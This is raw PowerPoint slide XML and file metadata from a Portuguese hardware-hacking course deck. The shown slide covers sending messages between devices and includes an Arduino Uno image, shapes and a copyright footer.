                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7E23EF-8308-4246-AB22-55CBD51D3D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712684" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Gráfico 29" descr="Voz">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD89CD95-FD25-425E-A242-7F7585294EB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184928" y="126015"/>
            <a:ext cx="188232" cy="18823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CA5700A-4D01-46E2-A89F-0A41C317DC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12108446" y="0"/>
            <a:ext cx="83554" cy="686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D117EA4-4BB5-4CC5-AB1D-E873968CCD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4972050" y="6440864"/>
            <a:ext cx="1431131" cy="422424"/>
            <a:chOff x="4984696" y="6092121"/>
            <a:chExt cx="1431131" cy="422424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F5C6B0-D121-4FA8-B771-B058CBD14602}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4984696" y="6092121"/>
              <a:ext cx="1431131" cy="422424"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom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96635D7-A3C4-4F20-A7EE-1834926E310D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5483059" y="6127172"/>
              <a:ext cx="468426" cy="3757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FC0FA747-3AB6-4B3F-9796-22A74FAA0668}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5553584" y="6145880"/>
              <a:ext cx="330587" cy="3439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8F7793B-0320-449A-8238-2F674ABF74CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5254264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0161FA9-7082-458A-A830-D3FC07CF950E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5188613" y="612717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BA95BCF-E2FC-412E-9434-4469EF663B8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5991237" y="621737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FBAD064-1C36-4A7B-8734-91C1B6C0CB05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="5950116" y="6161182"/>
              <a:ext cx="28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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Espaço Reservado para Número de Slide 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E930E8-74FD-4D50-8F6C-16FD9BF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2702" y="6475915"/>
            <a:ext cx="387681" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF48840C-D620-4806-B040-4FDD40732BED}" type="slidenum">
              <a:rPr lang="pt-BR" sz="1400" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="CaixaDeTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C539F6A-7896-4B2E-8C25-A1197DC2A72F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8963293" y="3371944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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Este material pertence ao Curso Hardware Hacking desenvolvido pela ACADITI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Todos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> os Direitos Reservados. A reprodução é estritamente proibida.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390A211-9A09-49E8-9AAB-D9EEE009DC62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149766" y="453860"/>
            <a:ext cx="1189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Enviando Mensagens entre dispositivos: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5D92B2E9-D8CA-4DA2-A3D2-7BF28BABD202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99620" l="0" r="99394">
                        <a14:foregroundMark x1="43030" y1="23954" x2="43030" y2="23954"/>
                        <a14:foregroundMark x1="6667" y1="34981" x2="6667" y2="34981"/>
                        <a14:foregroundMark x1="2424" y1="37262" x2="2424" y2="37262"/>
                        <a14:foregroundMark x1="26667" y1="7985" x2="26667" y2="7985"/>
                        <a14:foregroundMark x1="62020" y1="7985" x2="62020" y2="7985"/>
                        <a14:foregroundMark x1="58788" y1="760" x2="58788" y2="760"/>
                        <a14:foregroundMark x1="93131" y1="58555" x2="93131" y2="58555"/>
                        <a14:foregroundMark x1="93737" y1="43726" x2="91919" y2="57034"/>
                        <a14:foregroundMark x1="91919" y1="57034" x2="88081" y2="62357"/>
                        <a14:foregroundMark x1="94949" y1="39544" x2="96162" y2="58175"/>
                        <a14:foregroundMark x1="99394" y1="34601" x2="99394" y2="34601"/>
                        <a14:foregroundMark x1="77778" y1="95437" x2="77778" y2="95437"/>
                        <a14:foregroundMark x1="81414" y1="98859" x2="81414" y2="98859"/>
                        <a14:foregroundMark x1="85859" y1="94677" x2="85859" y2="94677"/>
                        <a14:foregroundMark x1="91919" y1="94297" x2="91919" y2="94297"/>
                        <a14:foregroundMark x1="92504" y1="91635" x2="92727" y2="94297"/>
                        <a14:foregroundMark x1="92121" y1="87072" x2="92217" y2="88213"/>
                        <a14:foregroundMark x1="91515" y1="94297" x2="82424" y2="95057"/>
                        <a14:foregroundMark x1="81414" y1="95057" x2="61616" y2="94677"/>
                        <a14:foregroundMark x1="61010" y1="95437" x2="36768" y2="94297"/>
                        <a14:foregroundMark x1="202" y1="33840" x2="202" y2="33840"/>
                        <a14:foregroundMark x1="1414" y1="32700" x2="1414" y2="32700"/>
                        <a14:foregroundMark x1="1414" y1="30418" x2="13131" y2="39544"/>
                        <a14:foregroundMark x1="3434" y1="75285" x2="11717" y2="78707"/>
                        <a14:foregroundMark x1="7475" y1="51331" x2="9091" y2="62738"/>
                        <a14:foregroundMark x1="29899" y1="33460" x2="39192" y2="34981"/>
                        <a14:foregroundMark x1="39192" y1="34981" x2="43030" y2="34221"/>
                        <a14:foregroundMark x1="20404" y1="49049" x2="19394" y2="59316"/>
                        <a14:foregroundMark x1="8081" y1="82510" x2="18586" y2="82890"/>
                        <a14:foregroundMark x1="18586" y1="82890" x2="31111" y2="80989"/>
                        <a14:foregroundMark x1="37172" y1="99240" x2="37172" y2="99240"/>
                        <a14:foregroundMark x1="40202" y1="99240" x2="40202" y2="99240"/>
                        <a14:foregroundMark x1="33333" y1="99240" x2="33333" y2="99240"/>
                        <a14:foregroundMark x1="33333" y1="89734" x2="33333" y2="89734"/>
                        <a14:foregroundMark x1="33131" y1="94297" x2="33131" y2="94297"/>
                        <a14:foregroundMark x1="33333" y1="92015" x2="33131" y2="98859"/>
                        <a14:foregroundMark x1="57778" y1="99620" x2="57778" y2="99620"/>
                        <a14:foregroundMark x1="92121" y1="87833" x2="92121" y2="87833"/>
                        <a14:foregroundMark x1="92121" y1="81749" x2="92121" y2="81749"/>
                        <a14:foregroundMark x1="86477" y1="78327" x2="86263" y2="85171"/>
                        <a14:foregroundMark x1="86667" y1="72243" x2="86477" y2="78327"/>
                        <a14:foregroundMark x1="89293" y1="78327" x2="89293" y2="86692"/>
                        <a14:foregroundMark x1="89293" y1="71483" x2="89293" y2="78327"/>
                        <a14:foregroundMark x1="92051" y1="78327" x2="91937" y2="88213"/>
                        <a14:foregroundMark x1="92121" y1="72243" x2="92051" y2="78327"/>
                        <a14:foregroundMark x1="92121" y1="86312" x2="92121" y2="86312"/>
                        <a14:backgroundMark x1="88081" y1="78327" x2="88081" y2="78327"/>
                        <a14:backgroundMark x1="99798" y1="57795" x2="99798" y2="57795"/>
                        <a14:backgroundMark x1="99798" y1="55894" x2="99798" y2="55894"/>
                        <a14:backgroundMark x1="99798" y1="53612" x2="99798" y2="53612"/>
                        <a14:backgroundMark x1="99798" y1="50190" x2="99798" y2="50190"/>
                        <a14:backgroundMark x1="99798" y1="46008" x2="99798" y2="46008"/>
                        <a14:backgroundMark x1="99798" y1="42966" x2="99798" y2="42966"/>
                        <a14:backgroundMark x1="99798" y1="41065" x2="99798" y2="41065"/>
                        <a14:backgroundMark x1="99798" y1="39924" x2="99798" y2="39924"/>
                        <a14:backgroundMark x1="99798" y1="38403" x2="99798" y2="38403"/>
                        <a14:backgroundMark x1="99798" y1="36122" x2="99798" y2="36122"/>
                        <a14:backgroundMark x1="99798" y1="35361" x2="99798" y2="35361"/>
                        <a14:backgroundMark x1="99798" y1="34601" x2="99798" y2="34601"/>
                        <a14:backgroundMark x1="99798" y1="34221" x2="99798" y2="34221"/>
                        <a14:backgroundMark x1="90909" y1="78327" x2="90909" y2="78327"/>
                        <a14:backgroundMark x1="87677" y1="86692" x2="87677" y2="93916"/>
                        <a14:backgroundMark x1="90707" y1="88213" x2="90707" y2="91635"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="28246"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684536" y="1671530"/>
            <a:ext cx="4250196" cy="3147112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Resultado de imagem para arduino uno png&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C7D417-18CE-4F9F-A9D8-A9473297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86" y="2053477"/>
            <a:ext cx="3314234" cy="23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EC953FE-662C-40DA-A548-C4F3B4D2F1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684536" y="1676400"/>
            <a:ext cx="0" cy="47695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32EDE25-0EB6-4062-812F-651690CEB8CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3194712" y="4279140"/>
            <a:ext cx="0" cy="243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A31F420-AF33-4801-82F9-FCEF44272A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2988972" y="4286760"/>
            <a:ext cx="0" cy="243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4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85BD7E9-4017-4AC9-A245-780307B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AB9F-5007-4CEE-ADAC-69865FB11CD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389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3729</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>527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Aharoni</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Rockwell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2019-06-18T11:53:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-12T13:38:14Z</dcterms:modified>
</cp:coreProperties>
</file>